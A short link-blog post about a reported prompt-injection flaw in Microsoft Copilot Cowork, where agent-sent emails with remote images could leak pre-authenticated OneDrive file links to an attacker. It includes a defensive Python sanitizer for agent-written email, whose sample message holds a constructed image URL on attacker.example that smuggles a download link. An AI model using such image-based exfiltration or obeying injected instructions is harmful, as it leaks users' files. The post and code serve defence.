Simon Willison's Weblog

Microsoft Copilot Cowork Data Leak Vulnerability


26th May 2026 - Link Blog

[Microsoft Copilot Cowork Exfiltrates Files](https://www.promptarmor.com/resources/microsoft-copilot-cowork-exfiltrates-files) ([via](https://news.ycombinator.com/item?id=48272354 "Hacker News")) The biggest challenge in designing agentic systems continues to be preventing them from enabling attackers to exfiltrate data.

In this case Microsoft Copilot Cowork (yes, that's a real product name) was allowing agents to send emails to the user's own inbox without approval... but those messages were then displayed in a way that could leak data to an attacker via rendered images:

> Because these messages can contain external images that trigger network requests to external websites, data can be exfiltrated when a user opens a compromised message sent by the agent.
>
> Since OneDrive can create pre-authenticated download links, a successful prompt injection could cause those links to be leaked, allowing files to be downloaded by the attacker.
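As an added example (not code from this post or from PromptArmor's write-up), here is the defender-side check that closes the channel described above: before an agent-authored message reaches the inbox, every remote image not on an internal allow-list is neutralised, and any image URL whose query string carries another URL or a long opaque token is flagged for review. The allow-listed host, the `.example` domains and the sample message are all constructed.

```python
import html
import re
from urllib.parse import parse_qs, unquote, urlparse

# Constructed allow-list: hosts the organisation serves its own images from.
ALLOWED_IMAGE_HOSTS = {"cdn.example-tenant.internal"}
# A long opaque query value is the shape a leaked pre-authenticated link or token takes.
TOKEN_RE = re.compile(r"[A-Za-z0-9_\-]{32,}")
IMG_SRC_RE = re.compile(r'(<img\b[^>]*?\bsrc\s*=\s*["\'])([^"\']+)(["\'])', re.I)

def classify_image_src(src: str, allowed_hosts=ALLOWED_IMAGE_HOSTS) -> str:
    """Return 'inline', 'allowed', 'external' or 'external-suspicious' for one <img> src."""
    parsed = urlparse(src)
    if parsed.scheme in ("", "cid", "data"):  # embedded image: no outbound request
        return "inline"
    if parsed.hostname in allowed_hosts:
        return "allowed"
    # A remote image whose query carries another URL or a long token is the
    # exfiltration pattern described in the post: data rides out in the request.
    for values in parse_qs(parsed.query).values():
        for value in values:
            decoded = unquote(value)
            if decoded.startswith(("http://", "https://")) or TOKEN_RE.search(decoded):
                return "external-suspicious"
    return "external"

def sanitize_agent_email(html_body: str):
    """Block every non-allowed remote image; return (sanitized_html, findings),
    where findings is a list of (src, verdict) for logging or review routing."""
    findings = []
    def _rewrite(match):
        src = html.unescape(match.group(2))
        verdict = classify_image_src(src)
        findings.append((src, verdict))
        if verdict.startswith("external"):
            # Neutralise the reference so the mail client makes no network request.
            return match.group(1) + "about:blank#blocked" + match.group(3)
        return match.group(0)
    return IMG_SRC_RE.sub(_rewrite, html_body), findings

# Constructed sample: one embedded image, one first-party image, one remote pixel
# whose query smuggles a download link, and one plain remote tracker.
SAMPLE_MESSAGE = (
    '<p>Summary ready.</p>'
    '<img src="cid:logo@tenant">'
    '<img src="https://cdn.example-tenant.internal/banner.png">'
    '<img src="https://attacker.example/pixel.gif?d=https%3A%2F%2Ffiles.example%2Fdl%3Ftoken%3Dabc">'
    '<img src="https://tracker.example/open.png?u=42">'
)
```

Running `sanitize_agent_email(SAMPLE_MESSAGE)` leaves the embedded and first-party images untouched and blocks both remote ones, with the link-smuggling pixel reported as `external-suspicious`.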
